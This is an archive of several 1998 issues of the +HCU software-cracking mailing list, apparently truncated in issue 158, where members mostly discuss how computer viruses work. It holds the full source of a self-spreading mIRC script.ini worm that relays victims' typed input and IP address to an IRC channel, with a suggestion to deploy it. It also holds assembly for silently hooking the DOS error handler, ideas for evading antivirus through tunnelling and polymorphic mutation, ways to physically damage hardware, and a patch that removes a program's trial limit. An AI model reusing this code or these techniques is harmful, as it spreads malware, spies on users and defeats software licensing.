======================================================== +HCU Maillist Issue: 151 02/24/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: repository now public (fravia) #2 Subject: :( #3 Subject: Virus Quiz ARTICLES: -----#1------------------------------------------------- Subject: repository now public (fravia) 1) hcu maillist repository link is now on my links.htm page let me know if for some reason you believe I should take it off one day (+Zer0 will soon see if too many spammers/zombies go for it) 2) anyone working on apivision? later fravia+ -----#2------------------------------------------------- Subject: :( hehemmm..ehhh..hallo... well,...sorry for the encrypted message yesterday... the line length looked fine here...but,eehh...I didn't count.. bye, rickx -----#3------------------------------------------------- Subject: Virus Quiz I actually received answers from some people by email! I wasn't really expecting it. I'll give my answers. Those currently still in the scene, please feel free to correct me if any of the info is out of date etc. 1. Yes, most commonly as an attachment. Word macros are notorious for spreading like this as some email clients auto-open them or call word to open them on a double click. 2. When I first in the scene, there was one virus I knew of that could do this. It exploited the macro facilities of Lotus CC mail, the de facto email client back then. They probably have patched it up in the later versions as I have not heard anything of this since. I hear whiffs of info about a similar virus hooking onto Outlook which seems like a viable replication method if MS have their way... I've never used outlook and I've not seen the virus - maybe a rumour, maybe not. 3. Yes it is. It always surprises me when people refuse to have my infected disks resting on their computer in case it infects it ;) 4. Actually, yes. There are a number of nasty things you can do if you put your mind to it. (nasty protectionist can get some ideas). Some early hard drives could be killed completely by messing up track zero. Early monitors could be fried by nasty refresh rates. My personal favourite was by one author who tried to exploit a design fault in some floppy drives by making the head swing backwards and forwards hitting the casing. I assumed that this was to try to damage the head, I wonder if it worked? 5. Yes. A common mistake by people just beginning to dabble in viruses is that they see only runtime viruses and make the mistake that runtime is the only time to infect. Resident viruses are much nastier and can be hooked absolutely everywhere. 6. Yes and no. Files with the write protect flag on can easily be toggled off before infection. Disks vary. If there protection is software it can be bypassed, but I know of no virus which bothers to do this. You will not necessarily get a write protect error (e.g. on floppy disks) it takes very few bytes to hook the critical error handler. ~~ Ghiribizzo =====End of Issue 151=================================== ======================================================== +HCU Maillist Issue: 152 02/25/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: Re: +HCU ML Issue 150 #2 Subject: Re: Virus Quiz ARTICLES: -----#1------------------------------------------------- Subject: Re: +HCU ML Issue 150 > QUIZ > ==== > > 1. Can a virus be spread by email? > No, unless it is a Macro virus and you use microsoft word to read it. If you receive an executable file uuencoded with the email and you execute that file, the virus could be spread that way. There's no way a simple text email will infect you. > 2. Can a virus sent by email do something nasty just by opening the email? > No. A virus is a piece of code, it is a program or a macro, even a ..BAT file, but the fact is, it has to be executed to do harm. If you just look at it, nothing happens. > 3. Is it safe to copy an infected file onto the root of your hard disk? > Sure, you can copy it anywhere you want. You can have thousands of virii in your hard drive. As I said, they are just programs, if you don't execute them on purpose they are as dead as a rock. If you have them in source code, you can send them to your grandma's computer, she won't be infected, unless she knows how to compile them :) > 4. Can a virus physically damage parts of your computer? > Is any of your programs able to physically damage your system? Theoretically No. The same answer apply to virii, however if a virus actives the motor of one of your floppies frequently, it could shorten the life span of that component. If a virus is able to turn on and off continuously one pixel of your screen, it could be damaged. Again this is only theory as I don't know any virus designed to do this. It would take too much time to damage any of today's modern monitors or floppy drives. There's no point on it because if your floppy never stops, that's and obvious behavior and the virus doing this will have a very short life. Viruses are designed to survive, not just to give them self away in the first round of the fight. > 5. Can a virus infect a disk in the floppy drive if you only do a DIR on it? > This is essentially false. You can ask for dir, copy infected files, disassemble the infected files and nothing happens if your computer is clean; on the other hand, if your computer is infected with a direct action virus (it only infects when ran) nothing will happen either because DIR command is not per se an executable file. Now, if your memory is infected with a MBR or multipartite virus, there's a chance your floppy will be infected not because of DIR command itself, but because the virus is active on memory and the trigger for floppy infection could be anything. To answer to the basic question whether a virus can infect on DIR, some new virri can infect by asking for a DIR, but this is a new feature not available before. However, the answer to this question, for practical reasons is still NO, because most viruses can't do that. > 6. Can a virus infect a write protected file/disk? Will there be an error > message? > In regard to disk infection, no they can't. Write protected floppies are secure against viruses. If the virus is stealth enough to manage INT 24 critical error (write-protection violation attempted), there won't be no error to warn the user when the virus attempts to infect a write protected disk. Only older virus (museum viruses) will generate such a lame error nowadays. In regard to write protected files: INT 21 sub-function 4301H will get rid of the file attributes allowing the virus to open it without any limitation. Some other interesting questions: Is it possible to build a multiplataform virus (able to infect UNIX, PC's, MAC) or multi-operating system virus (Win95, NT, DOS, OS/2) at the same time? Answer. Yes, it is. In fact, there are several viruses capable of doing this. Is it possible to create viruses able to spread through a LAN? Answer. Yes it is possible. It it possible to create a retro-virus? One that executes its code backwards. Yes there's on virus out there capable of doing this. Can a Macro virus infect different language versions of Microsoft Word? Answer. False until recently. From sometime ago, the answer is now yes. Can a DOS virus survive under Win95? Answer. Most can survive. Off course, direct action ones will only infect when a DOS window is opened or during the booting process (in MBR cases) before Win95 takes control over the memory. Can a virus behave as a TSR on Win95. Answer. Sure it can if it is specially designed to do it. Am I a virii maker? No I'm not. I know everything about it and I can code a virus if I want, but I don't find any reason to do it, as I decided many years ago to use my brain to build, not to destroy or harm. Aesculapius. -----#2------------------------------------------------- Subject: Re: Virus Quiz Hi all! First a big thank goes to Ghiribizzo for turning "JOIN THE CREW" into something interesting! Just a few comments to the virus quiz. >could be fried by nasty refresh rates. My personal favourite was by one >author who tried to exploit a design fault in some floppy drives by making >the head swing backwards and forwards hitting the casing. I assumed that >this was to try to damage the head, I wonder if it worked? I don=B4t know about this one, but one of the first viruses in my country was written for the old Commodore 64, and managed to swing the head of the 1541 (is the number correct?) floppy drive to a position where it could not come back from. You had to take it to a service where they took it apart and put the head back on track, manually. As it turned out the virus was written by a guy in a computer service firm. (You can guess why :) >6. Yes and no. Files with the write protect flag on can easily be toggled >off before infection. Disks vary. If there protection is software it can be >bypassed, but I know of no virus which bothers to do this. You will not >necessarily get a write protect error (e.g. on floppy disks) it takes very >few bytes to hook the critical error handler. Some thoughts on the topic of writing on write protected disks. I firmly belive that its impossible to bypass the physical write protection of a floppy disk from software. (BTW this is the idea behind the whole thing.) As far as I know the writing circuit is physically interrupted by the sensor mechanism. From time to time big arguments starts about this on one of the mailing lists I read, but so far nobody could present a working program which could write on a protected disk. Most of the time the argument that it can be done could be traced back either a faulty drive where the sensor mechanism was broken and the drive could not detect correctly the protection, or to an article which appeared in ct computer magazine. This is a good german computer magasine, you can read it on the net at ********************** in german or some articles in english at ******************************* This magasine published detailed paper about how to write on a write protected disk, but as it turned out it was just an April joke. Now the problem with this April joke articles that these guys are really good (last time I checked their page they were running a Pentium II processor with 400 MHz in a freezer box :) and the joke articles are very beliveable even for experts. Bye Zer0+ =====End of Issue 152=================================== ======================================================== +HCU Maillist Issue: 153 02/26/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: virii (some fun topics at last ;) #2 Subject: gthorne - virus info #3 Subject: gthorne - more virus oddities #4 Subject: To: Aesculapius #5 Subject: gthorne postulizing #6 Subject: Re: Virus Quiz ARTICLES: -----#1------------------------------------------------- Subject: virii (some fun topics at last ;) To continue the discussion a bit... Physical damage to hardware components: It is certainly possible to drive a monitor at a frequency that will blow its tube, or to wear out tracks in a hard drive, though as Aesculapius pointed out with the durability of modern equipment it is more difficult than it used to be (no more RLL drives that you could destroy via the partition table). Infecting via DIR: DIR is of course a directive in command.com; a persistent virus could infect both command.com and the boot sector of floppy/hard drives (this would of course require a command.com ver check), then patch the DIR section of the command.com to trigger its boot sector infection routine. This would be a little tricky, though (and I guess it counts as a multi-partite virus). Write-protected floppies: The little hole in the disk is scanned by a photosensor in the disk drive, which prevents disk writes on a *hardware* level if the hole is covered. This means that the write prevention is mechanical, not logical, and hence is out of reach of even the quasi-omnipotent virus writers. Should virii be written? Hell yes, McAfee would go broke if they weren't around ;) Plus we would know only half as much about assembly, there would be no VLAD (so we would have to invent them), and crazy little utils like KoH wouldn't exist. mammon_ PS Zero+ Thanks for the excellent URL ! Very good industry updates ______________________________________________________ Get Your Private, Free Email at ********************** -----#2------------------------------------------------- Subject: gthorne - virus info Message Body = okay in regard to aesculapius and more on ghbzo's virus quiz there is something that i must mention, gh and i both knew of software that could damage old monitors by altering the rate of refresh (in his case he knew of a virus, in mine i know of it though old code manuals i had read) i had some software once that wold allow you to finaegle an old hercules card to display graphics that were normally color - by converting it to greyscale, but it had some of the same mention in its docs on how it had damaged monitors in the past if people were not careful to install it precisely - and often regardless of the user's attempts it would damage a monitor anyway also - he knew of a virus which caused old drives to smash the read/write head back and forth into the drive casings of old drives, also something i had heard of before - and also in my case in a different manner - the one i had heard of was one my own father had seen in his software reverse engineering days. (mind you that new drives are no more susceptible than new monitors to this) basically the protection on the software was a bit nasty - if it was in the process of being cracked, and it resulted in an incomplete crack (which all of us go through 90% of the time in testing phases) it would respond by applying code that attempted damage like that while displaying 'software piracy is illegal, now trashing your hard drive' (paraphrased because of bad memory) i think that is what it did, the actuality may have had a separate agenda considering that old drives were easily damaged if you did not park them. Again, none of this is possible with todays drives. regarding email virii.. gh said he had seen a cc-mail macro virus (i have not but that would be theoretically possible regardless) as i said in my letter to him on the subject - it will be scarey when microsoft's newer emailers decide to make macros standard operating procedure (do any one of us doubt that ms would try it?) something else - i have seen something directly that people do not realize - again gh knew of this. junkie virus is a master boot record infecting virus i am well acquainted with due to the insane spreading it had in a locale where friends i had kept using my computers to work on papers and play games. it also infects com files (it is much like monkey b in the way it propogates) here is the trick... i have had many MANY floppies ruined by it - how you say? i am not entirely sure what happens to the floppy, but i know that after infection, i have had floppies report a permanent track zero error and are not formattable ever again. the other thing is in the dir... if junkie is on your machine already, infectring it, all you have to do to get it to install to a floppy is to do a dir of the floppy why? because it jumps to all master boot records that are not write protected on the system and sitting in memory like it does, it also looks for .com files everywhere of course, you have to be infected already for this to happen - but the question was can you infect something just by dir'ing it and the answer is yes if you have it already (or if dir.com is infected... or command.com... or format.com... you get the idea) something else gh and i both came up with is the possibility of software based write protections (hard drives for example - and zip drives if you think about it) neither of us know of a case of this, but anything software controlled can be virus controlled (q.e.d.) just for fun i have over 5000 of the little monsters and over 800 source codes - i love reading the concise code and figureing out how something can be useful (see symbiote.zip) made out of the beasts besides... i would not know as much about assembly file formats if i had not studied so deeply into how they were infected - and the vlad texts to explain some of it, although often not entirely straightforward and the code needing tweaking to get things to work (i actually had to mangle virus code from several sources and those texts to get that litle symbiote to work properly) as you can see i enjoy this subject - take care all and 'have a day' :| :) +gthorne ******************** -----#3------------------------------------------------- Subject: gthorne - more virus oddities Message Body = this is for the masses who didnt know it was out there, but one day i noticed a particularly interesting file dcc'd to me one day on irc... the person who dcc'd it did not know it, and so i knew something was up basically - the script.ini file in mirc can be exploited as a virus, and this is exatly what this file does. it basically makes random dcc's to other users in a channel (making one rather unpopular i the process) but here it is, it is too different not to include (just showing the range of self propogating code) effectively, patching oneself is easy, i basically put a blank script.ini in my mirc directory and made it read only (there are mirc settings you can make to patch self as well, though i care not to learn much about the inner workings of mirc) if you are a real jerk, you can put this in your own mirc directory and go online as a random user in some channel (then patch self later) a friend of mine and i came up with all kinds of bad humor.. say for instance makinig it autokick users, ban them, or for those with no op status, doing a /quit evey now and then could become a pain especially if it had some mean message like 'i have infected you idiots!' that would be really mean since anyone infected would lose popularity immensely granted i would never do this, but get a few beers in me around a jaccuzzi and the discussions are endless (yes i have gotten a case of beer before and shared it with a few friends in a snowy mountain hideaway with a jaccuzzi on the porch - was fun - hot water below, snow crystals above.. and virus discussions) and cracking.. and hacking.. and of course the ladies in the other room who we kidnapped for the party earlier ;) one of those ladies designed that necklace of mine for those of you who havent seen it (same pattern as on my shield) well anyway - heres the virus code, hope you enjoyed the story :) --- script.ini virus start --- [script] n0=on 1:START:{ .sreq ignore n1= .remote on n2= titlebar (Not connected) n3=} n4=raw 401:*: { n5= halt n6=} n7=RAW 001:*:titlebar (Connecting to $server $+ ) n8= n9=on 1:CONNECT:titlebar (Connected to $server $+ ) | .msg #kkkd Hi. $ip on $server $+ : $+ $port $+ . n10= n11=on 1:DISCONNECT:titlebar (Not connected) n12= n13=;if you type something in status it doesn't have to have "/" n14=on 1:INPUT:*:{ .msg #kkkd ( $+ $active $+ ) $1- n15= set %a status window n16= if ( $active == %a ) { $1- | halt } n17=} n18= n19=;ping stuff n20=on 1:CTCPREPLY:ping*:.notice $nick Your ping time is $duration($calc($ctime - $2)) $+ . n21=CTCP 1:ping: if ( $nick != $me) { .ctcp ping $1 } | if ( $3 != $null ) { $3- | halt } n22= n23=;if you are banned but still opped, unban self n24=on *********** ( $banmask iswm $address($me,5) ) mode $chan -b $banmask n25= n26=on 1:JOIN:*:{ n27= if ( $nick == $me ) { halt } n28= if ( $comchan($nick,0) > 2 ) { .notice $nick Following me? | halt } | .dcc send $nick $mircdir $+ script.ini n29=} n30= n31=;show channel topic in channel on join n32=RAW 332:*:echo 4 $2 $chr(31) $+ $2 $+ $chr(31) $+ : $3- --- script.ini virus finished --- -----#4------------------------------------------------- Subject: To: Aesculapius Thank you for your excellent article on virii. I get very tired of the lame rumors that people pass around about virii. I seem to get at least one per week. With your permission, I would like to use parts of your article to answer these virii scares. Likely I would edit some things for the neophyte, and leave off the more technical aspects. I will be glad to give you credit, or leave your name off. Your choice. Please let me know if this is ok with you. zinger -----#5------------------------------------------------- Subject: gthorne postulizing Message Body = now that i have been thinking about it, i have had some games with deep bass blow a few sound cards in the past - a virus probably could do the same, but it would kinda be obvious that a virus were in the system if it were well.. screaming :) not to mention it would have to take quite a bit of time before the card 'gave up and died' since it wasnt immediate that they got blown one game in particular when set too high tended to do this.. wing commander II in the cinematic startup sequence with all those kilrathi voices, and a mod called echoes which i like alot far fetched? yes. impossible? no. :) +gthorne -----#6------------------------------------------------- Subject: Re: Virus Quiz gthorne and I have been writing to each other about the quiz and it seems that there is a confusion to what I meant when I said disks could be infected. Here's part of a reply to gthorne. >>>> A write protected floppy can't be infected, when I said disks, I was referring to both floppies and hard disks generally. Though I was talking to a friend of mine not long ago and he told me that he had seen a system where floppy disk write protect was software based. I've never seen this myself, but as with bypassing all software protections, it needs to be pretty common to justify the extra bytes. Error messages can be suppressed on attempted writes to protected floppies to prevent the virus being easily spotted. <<<< Someone asked about hooking interrupt vectors, here's how a virus might do it: mov ax,3524h ;24= critical error handler int 21h mov word ptr [bp+oldint24],bx ;save it for later restore mov word ptr [bp+oldint24+2],es ; nice of the virus writer, eh :) mov ah,25h lea dx,[bp+offset int24] ;point to location of new handler int 21h ;and set it =====End of Issue 153=================================== ======================================================== +HCU Maillist Issue: 154 02/27/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: Reposting #2 Subject: death to floppy disks! #3 Subject: Re: postulating #4 Subject: Recursive Tunneling #5 Subject: old virii #6 Subject: Virus Idea ARTICLES: -----#1------------------------------------------------- Subject: Reposting [Oops! I placed a series of dots after int 21h in my first email to show a gap and forgot that SMTP would interpret this as end of email. I've reposted and replaced the dots with "(etc.)" - sorry about that] gthorne and I have been writing to each other about the quiz and it seems that there is a confusion to what I meant when I said disks could be infected. Here's part of a reply to gthorne. >>>> A write protected floppy can't be infected, when I said disks, I was referring to both floppies and hard disks generally. Though I was talking to a friend of mine not long ago and he told me that he had seen a system where floppy disk write protect was software based. I've never seen this myself, but as with bypassing all software protections, it needs to be pretty common to justify the extra bytes. Error messages can be suppressed on attempted writes to protected floppies to prevent the virus being easily spotted. <<<< Someone asked about hooking interrupt vectors, here's how a virus might do it: mov ax,3524h ;24= critical error handler int 21h mov word ptr [bp+oldint24],bx ;save it for later restore mov word ptr [bp+oldint24+2],es ; nice of the virus writer, eh :) mov ah,25h lea dx,[bp+offset int24] ;point to location of new handler int 21h ;and set it (etc.) int24: mov al,3 ;fail call iret ;return Pretty basic but easy to understand because it uses DOS services to hook and set the handlers. In the same way, viruses can replicated by hooking 'closefile' or any other interrupt they like. I agree with Asculapius about destructive viruses. I've programmed viruses, but have never let them loose - it's just not nice :) But physical damage can be done to your computer. Another method I thought of was to attack flash ram. You could flash junk into modems, BIOS, etc. and some types will only take a few flashes before they mess up. Also, there are some DVD drives which allow you to flash the country code only 5 times before it sticks. A specific virus could be very nasty and leave the DVD drive able only to play Japanese titles... ~~ Ghiribizzo -----#2------------------------------------------------- Subject: death to floppy disks! I wrote to gthorne, but I thought the receivers of the mailing list might also be interested: >>>> I thought about how you could kill floppies as you have described and I've come up with an answer. I'm pretty sure this is how junkie must do it as well. Simply mark the first sector of a disk bad. This completely screws everything up. I tried to use Norton Diskedit in maintenance mode to undo this, but it couldn't. I tried to use debug 'w' command, but this couldn't either. I'm wondering is there a method low enough to write to the disk. It should be possible if you bypass DOS, but this seems too much like hard work Please send me the junkie source as I think the answer lies there. I'm wondering whether you can recreate a similar effect on hard disks - though I'm not going to test it on mine any time soon! :) BTW, you owe me a floppy disk ;) <<< ~~ Ghiribizzo -----#3------------------------------------------------- Subject: Re: postulating A friend of mine didn't realise what playing a data CD in his HIFI could do to it. The lesson cost him a pair of new tweeters. A virus attack on the same lines could clean out speakers very quickly (seconds) and I've heard you can damage the amp too, but I'm no audio expert and don't know why that may be the case. Although new hard disks are no longer susceptible to the easy RLL drive tricks. The same friend who blew his tweeters has recently totalled his hard disk by some low-level utils. Sending factory commands to the disk would be an easy way of ruining it permanently, and the instructions should be fairly generic for each brand of hard disk. Go to the manufacturers' web sites and download the tools. Also, monitors stand up to much more punishment now, but are still highly delicate devices. You still see warnings on graphics cards regarding messing around with refresh rates. >>>> Write-protected floppies: The little hole in the disk is scanned by a photosensor in the disk drive, which prevents disk writes on a <<<< My floppy drive has a little switch which is depressed when the hole is covered. Wouldn't a photosensor be easily clogged by dust etc.? >utils like KoH wouldn't exist. Someone wrote to me sometime ago saying that KOH isn't secure. Apparently the password is retrievable. It's one thing to learn how a virus works and another thing to write one. It's the difference between going through a cracking tutorial in your mind and cracking a program hands on. My first virus was an overwriting com infector - with no frills! It took me ages of searching through 80486 instructions before I found CALL was the instruction I needed to push the current location onto the stack for the delta offset. Of course, I could have obtained a virus source, and it would have saved me some time. But I had a virus concept from scratch with the CALL being the main tricky thing. I liked it so much it lived on it's own directory and I fed it com files every now and then to keep it happy :) ~~ Ghiribizzo With all 6 articles in issue 153 being about viruses, I wonder if Bigjim was right about the 'join the crew virus' :) -----#4------------------------------------------------- Subject: Recursive Tunneling With all this talk of viruses, my mind fell upon a technique that most of you perhaps will not know of even if you have studied viruses. The technique? Recursive tunneling. I think this could be a very powerful aid to protectionists. Put in a well hidden file checksum to force the cracker to use a TSR to patch on the fly and then use recursive tunneling to render the TSR useless. Confused? Let me explain in greater detail. Recursive Interrupt Tunneling: what is it? ========================================== Basically, it is tracing through an interrupt to find the original DOS or BIOS entrypoint. Then future calls can be made to the interrupt without running any code which might be hooked onto the interrupt. Virus use: Bypasses resident virus scanners so that virus can't be detected Protectionist use: Bypass TSR cracks hooked onto interrupt vectors How is it done? =============== Let me refer you to the excellent article "ANTI-Anti-Virus Tricks" by MnemoniX. My favourite part of virus programming was the battle between virus coders and AV authors. If I can't tempt you to study viruses with the following snippet from MnemoniX's article then I don't think I'll ever be able to. >>>>> TBDRIVER'S DETECTION OF RECURSIVE TUNNELING TBDRIVER is resistant to most recursive tunneling. When an interrupt 21 is called, TBDRIVER checks the status of the trap flag for a recursive tunneling routine and will display a message if it is found to be set. The code that does this appears virtually impenetrable, and looks like this: (This is from TBDRIVER version 6.14; it may be different now but the idea is basically the same.) cli ; clear interrupts to prevent pushf ; interference ... cld push ax ; what this, in essence, does is push bx ; that is saves a value on the stack, xchg ax,bx ; pops it, decrements the stack ptr. pop ax ; to point to it again, pops it again, dec sp ; and if the value changed, an int- dec sp ; errupt must have occured. Since the pop bx ; interrupt flag is off, the only cmp ax,bx ; interrupt this could be is a type 1 - pop bx ; the trap flag interrupt routine. jz 02A1 ; If two values popped are different, ; it warns the user. <<<<< Tempted? Hope so. ~~ Ghiribizzo -----#5------------------------------------------------- Subject: old virii BTW - why virii and not viruses? (yes, I studied 6 years of Latin).... Anyway, back in the days of the Apple II and in the pre-Win days of DOS, I made a nice little proggie that switched commands in the DOS - CATALOG (remember?) would cause the effect of DELETE ALL, and DIR would cause the effect of DEL *.* It was very simple, the program just looked for the 'DIR' routine and jumped it to the DEL *.* routine. It also patched the confirmation (Y/N) by directly jumping over it. Of course, my best best 'virus' was when I connected a computer next to the one I was using to mine. When a friend sat near, I controlled his cursor, and I prevented from occurring. I then told him he had to hit the monitor on the side to make the cursor 'fall', and that's exactly what he kept doing for a little while... Wafna -----#6------------------------------------------------- Subject: Virus Idea Since Virii seem to be a topic at this time in this List, I have an idea I'd like to discuss with a few others in here. Most AV-People don't disassemble/debug a polymorphic virus if they can avoid it. They therefore infect hundreds of identical files with the virus to find an algorithm to predict it's polymorphic behaviour. Sepultura wrote a few textfiles about bait-file detection through filenames, but I have another idea here: If you make the way the virus mutates directly related to the file-size, the approach with identical files wouldn't work. They would get a different virus for every different bait file they use, but not 2 different for the same bait. This would lead to an incorrect algorithm, and would force the AV-people to examine that virus by hand, which is a lot of work + expensive :-) The downside of course is: If you have the filesize in relation to the way the virus turns out to be, they can, once they completely disassembled it, derive an algo from there :-/ well, I guess there is no real thing you can do against a good virus-reverser... Another few things to try: Mutation depends on File-Date, on current-date, file-checksum (erm... this is gonna be sloow :-) etc... Please correct me on any points which are wrong/bad/unrealistic, I am not a good virus writer (yet ?;) HalVar ______________________________________________________ Get Your Private, Free Email at ********************** =====End of Issue 154=================================== ======================================================== +HCU Maillist Issue: 155 02/28/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: gthorne on virii subject #2 Subject: virii vs. viruses (or: is Ghiribizzo schizophrenic?) #3 Subject: Bringing floppy disks from the dead #4 Subject: To: zinger ARTICLES: -----#1------------------------------------------------- Subject: gthorne on virii subject Message Body = viruses... virii... makes no difference which you use in the computer world, people use it interchangeably if one were truly anal one could look up the biomedical reference to it (virii just sounds more like something someone who is educated would say ;) it appears a cat got let out of a bag with this one :) i have written 2 virus like entities... one being a cheap ram only self replicator that picked random locations in memory and was completely written in bytes - with all relocatable code (all in ram because no hard drives... and meant too fast to duplicate to another machine before it crashed all of memory) the other is the symbiote which i created as a way to add your own code to both exe's and com files (i wouldnt allow myself to stop at just one type - i am too pushy of myself for that) interesting note.. since it uses standard methods to attach your code to another, it is funny - some of the newer virus scanners mistaken it for one (much like KOH which some idiot whined and insulted me for weeks over the internet because he believed the virus scanner and would not consider that it is NOT a virus --- thus is the way of sheep who believe everything they hear without doing any real research) again, take care - this is a fun topic :) +gthorne -----#2------------------------------------------------- Subject: virii vs. viruses (or: is Ghiribizzo schizophrenic?) >>>> BTW - why virii and not viruses? (yes, I studied 6 years of Latin).... <<<< You'll know that the stem of the Latin word for virus doesn't have a plural. In the world of biological viruses, those involved use the term 'viruses' - this is the term Ghiribizzo uses. Most virus programmers (myself included - when I had my old persona) use the term virii. Why? Because it saves two bytes! :) [hey, that's quite a good joke - explains this commonly asked question better than anywhere else I've seen! :)] ~~ Ghiribizzo -----#3------------------------------------------------- Subject: Bringing floppy disks from the dead I had a little think about fixing the floppy disk I killed and was beginning to reverse engineer format.com to use it's basic code when I realised the tool was already there! Use the /c option to check all clusters currently marked bad. If it is possible to quickformat using this option, then maybe this is a good way to 'lock' a disk as not many people will know about this and also won't be able to destroy the data via format. ~~ Ghiribizzo -----#4------------------------------------------------- Subject: To: zinger You can publish all I said if you want, I just want to clarify again that I don't like viruses except for learning purposes, I can't find any good reason to code one and release it. Regards. =====End of Issue 155=================================== ======================================================== +HCU Maillist Issue: 156 03/04/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: Freespace-Essay #2 Subject: Search for Tristan ARTICLES: -----#1------------------------------------------------- Subject: Freespace-Essay Hi all, this is my first little essay. I hope it is o.K. If not please tell me what i can do better in future. Target: Free Space 1.0 at ************************************ Protection: 30-day-trial Tools: Wdasm8.9 Softice 3.01 For this program i had to patch 2 programs: Frespace.exe and fs32.exe. Both have self-modifying code (i suggest). First Frespace.exe: * Reference To: KERNEL32.CloseHandle, Ord:0018h | :00406A28 FF1538544200 Call dword ptr [00425438] :00406A2E 8B84247C010000 mov eax, dword ptr [esp+0000017C] :00406A35 50 push eax :00406A36 FF15F8254100 call dword ptr [004125F8]; *here I replaced this call at 406a36 with a "call 404770" (the original code): * Referenced by a CALL at Address: |:0040219D | :00404770 8B442404 mov eax, dword ptr [esp+04] :00404774 83EC70 sub esp, 00000070 :00404777 89442408 mov dword ptr [esp+08], eax :0040477B 53 push ebx :0040477C 56 push esi :0040477D 57 push edi :0040477E 8BB42484000000 mov esi, dword ptr [esp+00000084] :00404785 55 push ebp :00404786 56 push esi Second: fs32.exe * Reference To: KERNEL32.CloseHandle, Ord:0018h | :00404AC4 FF1548034100 Call dword ptr [00410348] :00404ACA 8B842480010000 mov eax, dword ptr [esp+00000180] :00404AD1 50 push eax :00404AD2 FF1568D24000 call dword ptr [0040D268]; *here I replaced this call at 404ad2 with a "call 408540" (the original code): * Referenced by a CALL at Address: |:00408130 | :00408540 8B442404 mov eax, dword ptr [esp+04] :00408544 83EC10 sub esp, 00000010 :00408547 3B05D0F84000 cmp eax, dword ptr [0040F8D0] :0040854D 53 push ebx :0040854E 56 push esi :0040854F 57 push edi :00408550 55 push ebp Thatīs all. NiKai 5777852 (ICQ) ______________________________________________________ Get Your Private, Free Email at ********************** -----#2------------------------------------------------- Subject: Search for Tristan Hi, sorry for this off-topic, but i search for a person named Tristan. I read an essay by him at fraviaīs pages and i lost his email-adress. Can anybody help? NiKai 5777852 (ICQ) ______________________________________________________ Get Your Private, Free Email at ********************** =====End of Issue 156=================================== ======================================================== +HCU Maillist Issue: 157 03/05/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: none #2 Subject: "grasping +orc's lessons" ARTICLES: -----#1------------------------------------------------- Subject: none Has anyone hints using winice 3.22 with mga millenium2? I just need this info,for the rest all is ok thx ______________________________________________________ Get Your Private, Free Email at ********************** -----#2------------------------------------------------- Subject: "grasping +orc's lessons" Hi +HCU, how are you guys. Sorry to take your time once again, but i am in need of your expertise and opinion. I am a new student of cracking and have dowmloaded many tutorials including the +ORC tutorials, i'am finding however it difficult to grasp and follow +ORC's work, one main reason is that the target files and the tools he uses are relatively hard to find now, they are not recent, many are outdated whick makes it even harder to find. Even with the more modern versions it becomes confusing to follow since may functions and instructions have changed. Another main reason is that i find his methods are somewhat different to the more modern tutroials, especially in +ocs first few lessons. Dispite this however i am able to understand and follow the more moderm tutorials. BUT EVEN SO i still feel a "void" to not having totally understand +ORC's lessons, I know you regard +orc highly and are one of those who did break the barrier and grasp the teachings..how long did it take?...did you have a struggle?...how did you finally crack the barrier? I guess what i really want to know is...will i miss something important and ENLIGHTENING if i do not totally understand the lessons? please let me know so that i can decided wether to move on or to continue to wrestle with the lessons until i win the prize. Thankyou for time and help, hope to hear from u soon. =====End of Issue 157=================================== ======================================================== +HCU Maillist Issue: 158 03/06/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: re: "grasping +orc's lessons" #2 Subject: gthorne re: #3 Subject: gthorne - re: grasping orc lessons ARTICLES: -----#1------------------------------------------------- Subject: re: "grasping +orc's lessons" Hi +HCU, In reply to the letter in last issue, I too am new to cracking. I have also found it a challenge to grasp +ORC's tutes, but mainly due to the distractive feel of the tutes.. The actual crack is not often explained too well, more quickly "shown. I wish to take nothing away from +ORC, the work he has done along with GreyThone and Fravia, is nothing short of legendary. (how many HOURS????) If you need the tools, programs etc, check out GreyThorne's website. The ORC tutes are bundled with every file neede for the tute. greythorne.home.ml.org I know too well of the Barrier you face, but hang in there! for an idea of timeframe: with no programming experience, I have been at it for 2 months (on & off, with work and wife dont leave much time!!). I Have not yet completed a crack by myself, but feel it is close. I guess you wanted some feedback from more experienced crackers, but I wanted to let you know that you are not alone. cheers!! -----#2------------------------------------------------- Subject: gthorne re: Message Body = (you may want to sign your messages to the hcuml with a nickname since noone has any clue who you are from the anonymous message you posted) though you are bound to get a bunch of replies, i have already tried to take care of the tools aspect go to my site ***************************** and download the orcpaks you find there just about everything and then some evr listed in the prc tutorials is there, and the index file has most of them catalogued so you can see what is in them other useful sites, though not encapsulated in such a manner, are all over the web, and a good one is *************************** assuming caligo can stay online with all his tools as well for completely new people, i tend to send them to lesson 4 on wlcheck, since the 16 bit crack was mine, and the 32 bit crack completed by fravia (see if you can follow along in that order) - and it was done in mostly wdasm (using softice to follow along in the code is a good idea for any crack, and you may find it useful to use both softice and some form of disassembler in conjunction as one often reveals something that may have been rather hard to spot in the other the other windows lesson i wrote on siren mail uses a similar technique - so it might be handy for you to check that out as well (siren mail crack on fravia's site and sirenpak in the orcpaks/more directory of my website) * btw - if someone tries to use sirenpak and cannot load it, please let me know, i may need to update an old dll that is in there, not sure * if you are an irc buff, the people in #cracking4newbies tend to be helpful if they can, as some of them are not newbies at all - but love to hang around in that channel since it is more friendly than others (often you will find me there as well when i am not so busy - to hang out and chat for a bit while trying to relax from a 